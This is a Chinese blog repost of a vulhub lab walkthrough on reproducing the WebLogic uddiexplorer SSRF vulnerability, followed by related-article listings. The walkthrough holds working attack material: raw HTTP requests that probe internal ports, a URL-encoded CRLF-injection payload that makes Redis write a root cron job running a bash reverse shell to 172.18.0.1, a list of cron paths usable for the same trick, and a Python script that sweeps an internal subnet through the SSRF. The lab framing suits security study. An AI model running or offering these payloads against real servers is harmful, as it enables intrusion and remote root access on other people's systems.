weblogic-SSRF

最新推荐文章于 2024-04-07 14:16:22 发布
最新推荐文章于 2024-04-07 14:16:22 发布
阅读量644 收藏
点赞数 1
文章标签: 数据库 shell 操作系统
原文链接:http://www.cnblogs.com/luoji123/p/9369743.html
版权

https://github.com/vulhub/vulhub/tree/master/weblogic/ssrf

Weblogic SSRF漏洞

Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。

测试环境搭建

编译及启动测试环境

docker-compose build
docker-compose up -d

访问http://your-ip:7001/uddiexplorer/,无需登录即可查看uddiexplorer应用。

SSRF漏洞测试

SSRF漏洞存在于http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp,我们在brupsuite下测试该漏洞。访问一个可以访问的IP:PORT,如http://127.0.0.1:80

GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001 HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close

可访问的端口将会得到错误,一般是返回status code(如下图),如果访问的非http协议,则会返回did not have a valid SOAP content-type

修改为一个不存在的端口,将会返回could not connect over HTTP to server

通过错误的不同,即可探测内网状态。

注入HTTP头,利用Redis反弹shell

Weblogic的SSRF有一个比较大的特点,其虽然是一个“GET”请求,但是我们可以通过传入%0a%0d来注入换行符,而某些服务(如redis)是通过换行符来分隔每条命令,也就说我们可以通过该SSRF攻击内网中的redis服务器。

首先,通过ssrf探测内网中的redis服务器(docker环境的网段一般是172.*),发现172.18.0.2:6379可以连通:

发送三条redis命令,将弹shell脚本写入/etc/crontab

set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/172.18.0.1/21 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

进行url编码:

test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.18.0.1%2F21%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa

注意,换行符是“\r\n”,也就是“%0D%0A”。

将url编码后的字符串放在ssrf的域名后面,发送:

GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://172.18.0.3:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.18.0.1%2F21%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close

成功反弹:

最后补充一下,可进行利用的cron有如下几个地方:

  • /etc/crontab 这个是肯定的
  • /etc/cron.d/* 将任意文件写到该目录下,效果和crontab相同,格式也要和/etc/crontab相同。漏洞利用这个目录,可以做到不覆盖任何其他文件的情况进行弹shell。
  • /var/spool/cron/root centos系统下root用户的cron文件
  • /var/spool/cron/crontabs/root debian系统下root用户的cron文件

 

 

利用SSRF进行端口探测

#!/usr/bin/env python
# coding: utf-8
#'Weblogic SSRF 扫描内网 IP 开放端口 '
import argparse
import thread
import time
import re
import requests


def ite_ip(ip):
    for i in range(1, 256):
        final_ip = '{ip}.{i}'.format(ip=ip, i=i)
        print final_ip
        thread.start_new_thread(scan, (final_ip,))
        time.sleep(3)

def scan(final_ip):
    ports = ('21', '22', '23', '53', '80', '135', '139', '443', '445', '1080', '1433', '1521', '3306', '3389', '4899', '8080', '7001', '8000','6389','6379')
    for port in ports:
        vul_url = args.url+'/uddiexplorer/SearchPublicRegistries.jsp?operator=http://%s:%s&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search' % (final_ip,port)
        try:
            #print vul_url
            r = requests.get(vul_url, timeout=15, verify=False)
            result1 = re.findall('weblogic.uddi.client.structures.exception.XML_SoapException',r.content)
            result2 = re.findall('but could not connect', r.content)
            result3 = re.findall('No route to host', r.content)  #bugfix:此处进行优化,防止抛出no route to host类型错误
            if len(result1) != 0 and len(result2) == 0 and len(result3) == 0:
                print '[!]'+final_ip + ':' + port
        except Exception, e:
            pass


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Weblogic SSRF vulnerable exploit')
    parser.add_argument('--url', dest='url', required=True, help='Target url')
    # parser.add_argument('--ip', dest='scan_ip', help='IP to scan')
    args = parser.parse_args()
    # ip = '.'.join(args.scan_ip.split('.')[:-1])
    ip = "172.19.0"   #这里diy了一下,用来探测172.19.0网段中各组件的开放的端口,试图找出redis位置。ps:我也探测过172.18.0网段,但其中并没有开启6379的。
    if ip:
        print ip
        ite_ip(ip)
    else:
        print "no ip"
python weblogic_ssrf.py --url http://192.168.199.128:7001

转载于:https://www.cnblogs.com/luoji123/p/9369743.html

anna11119
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
weblogic密码加解密 - rznice的专栏 - CSDN博客1
08-03
1. 密钥K1进DES加密 2. K2对步骤1的结果进DES解密 3. 步骤2的结果使密钥K1进DES加密
又一次漏洞复现与分析
qq_53058639的博客
02-21 90
Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令执行。
Weblogic Managed Server 启动失败
VipWangJian的博客
11-11 1066
[code="java"]近来启动WebLogic Managed Server 时出现如下错误: [/code] [code="java"]解决方法: Follow the following steps: 1: remove the boot.properties file completely from the managed ser...
weblogic创建域-拷贝方式
wengjixi的专栏
06-28 3741
Domain简单定义为:是一个逻辑管理单元,Domain下面包含着weblogic应用服务器中的所有东西,weblogic应用服务器的启动,停止都是以domain为单位进行管理的。概述:本次操作是通过拷贝已有域的方式创建一个新的域名,weblogic的版本为10.3.6,Linux操作系统。1、通过已有域拷贝出一个新的域:本例子中,已经存在了一个域base_domain,通过拷贝这个域,也就是直接...
Weblogic 常见漏洞汇总
热门推荐
box
04-20 1万+
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 WebLogic XMLDecoder反序列化漏洞(CVE-2017-3506) 0x00 漏洞描述 网上爆出weblogic的WLS组件存在xmldecoder
weblogic CVE-2018-3191 exp(含weblogic-spring-jndi-10.3.6.0.jar)
07-05
自用CVE-2018-3191 weblogic反序列化exp。
weblogic-monitoring-exporter:WebLogic监视导出器通过REST API公开指标和监视数据,以供其他工具(例如Prometheus)使用
02-04
WebLogic监视导出器 WebLogic Monitoring Exporter使用刮取运行时信息,然后导出与兼容的指标。 它通常作为Web应用程序部署在要从中获取指标的实例的WebLogic Server(WLS)实例12.2.1版或更高版本中。 下载发行版 ...
K8 weblogic-CVE-2018-2628-getshell
07-16
K8 weblogic-CVE-2018-2628-getshell 渗透测试工具!请勿滥用! K8 weblogic-CVE-2018-2628-getshell 渗透测试工具!请勿滥用!
WebLogic SSRF 及漏洞修复
11-25
WebLogic SSRF 及漏洞修复方法 CVE-2014-4210 10.0.2,10.3.6
weblogic-framework:网络逻辑框架
03-25
weblogic-framework是检测weblogic漏洞的最佳工具。 免责申明 本工具仅适用于安全技术研究,可以使用本工具发起网络黑客攻击,造成的法律后果,请使用者自负。 使用方式 常用突破 由于Weblogic的补丁是互斥的,安装...
Weblogic 常见漏洞分析与利用
未完成的歌~的博客
03-23 7369
一直没有系统的总结过 weblogic 的漏洞,今天通过 vulhub 靶场来复现几个经典的案例。WebLogic 是美国 Oracle 公司出品的一个基于 JAVAEE 架构的中间件,是用于开发、集成、部署和管理大型分布式 Web 应用、网络应用和数据库应用的Java应用服务器。WebLogic 由纯 Java 开发,长期以来一直被认为是市场上最好的J2EE工具之一,被广泛应用于开发、部署和运行 Java 应用等适用于本地环境和云环境的企业应用。
[Java安全]—weblogic常见漏洞
Sentiment的博客
07-11 3401
本来想跟一些T3反序列化的,奈何本地环境怎么都起不起来先复现一下常见漏洞吧。。。Weblogic是美国Oracle公司出品的一个应用服务器(application server),确切的说是一个基于Java EE架构的中间件,是用于开发、集成、部署和管理大型分布式Web应用、网络应用和 数据库应用的Java应用服务器。Vulhub - Docker-Compose file for vulnerability environment 启动环境后访问,进入后台弱口令直接登录weblogic常用弱口令: htt
Weblogic常见漏洞详解
m0_64481831的博客
03-01 2078
Weblogic 是一个基于JavaEE架构的中间件,是用于开发、集成、部署和管理大型分布式为Web应用、网络应用和数据库应用的Java应用服务器。Weblogic由纯Java开发,被广泛应用于开发、部署和运行Java应用等适用于本地环境和云环境的企业应用。所以,Weblogic在面试当中被提到频率还蛮高的。这篇文章以vulhub靶场为辅。Weblogic中间件常见漏洞文章讲了任意文件读取和弱口令登录、未授权访问后台和HTTP请求远程代码执行、SSRF利用、XMLDecoder反序列化漏洞。
weblogic 加密解密
processengine的专栏
04-16 3755
最近对于weblogic的加密解密一阵折腾。。。 在此将遇到的问题和
weblogic中间件漏洞汇总
混子
11-24 8750
目录一、weblogic是什么?二、安装环境1、下载weblogic2、安装(其实就是点点点啦)三、反序列化漏洞1、XMLDecoder(CVE-2017-102712、XMLDecoder (CVE-2017-35063、wls-wsat远程代码执行(CVE-2019-27254、T3协议命令执行(CVE-2018-26285、 IIOP(CVE-2020-2551四、SSRF1、SSRF(CVE-2014-42102. SSRF联动Redis3、防御五、未授权访问1、Console HTTP协议远程代码
weblogic漏洞
scu_hacker博客
01-17 4115
目录 前言 一、任意文件上传 1.1影响范围 1.2 漏洞详情 二、弱口令+后台war包 三、ssrf漏洞 3.1影响范围 3.2 漏洞详情 四、反序列化漏洞 总结 前言 weblogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器,本文介绍常见的几个weblogic漏洞原理、复现。 一、任意文件上传 1.1影响范围 weblogic 10.3.6.0 weblogic 12.1.3.0 weblogic 12.2.1.2 .
weblogic weak password复现
飞鱼的企鹅的博客
07-27 1707
环境 基于vulhub的weblogic弱口令漏洞和任意文件读取漏洞 弱口令 本环境存在弱口令 用户名:weblogic 密码:Oracle@123 weblogic常见的弱口令组合 1. Oracle - WebLogic Method HTTP User ID system Password password Level Administrator Doc Notes Login loc...
【渗透测试】Weblogic系列漏洞
weixin_53972936的博客
11-01 3186
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
关于MacOS下,弱口令 weblogic_decrypt.jar启动或解密报错问题
最新发布
marsAphrodite的博客
04-07 238
MacOS下,weblogic_decrypt.jar启动解密报错问题
weblogic漏洞ssrf
08-15
vulhub weblogic ssrf漏洞是指在WebLogic服务器中存在一种安全漏洞,攻击者可以利用该漏洞来发起服务器端请求伪造(SSRF)攻击。攻击者可以利用该漏洞来访问受保护的内部网络资源,或者利用该漏洞来发起其他攻击,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值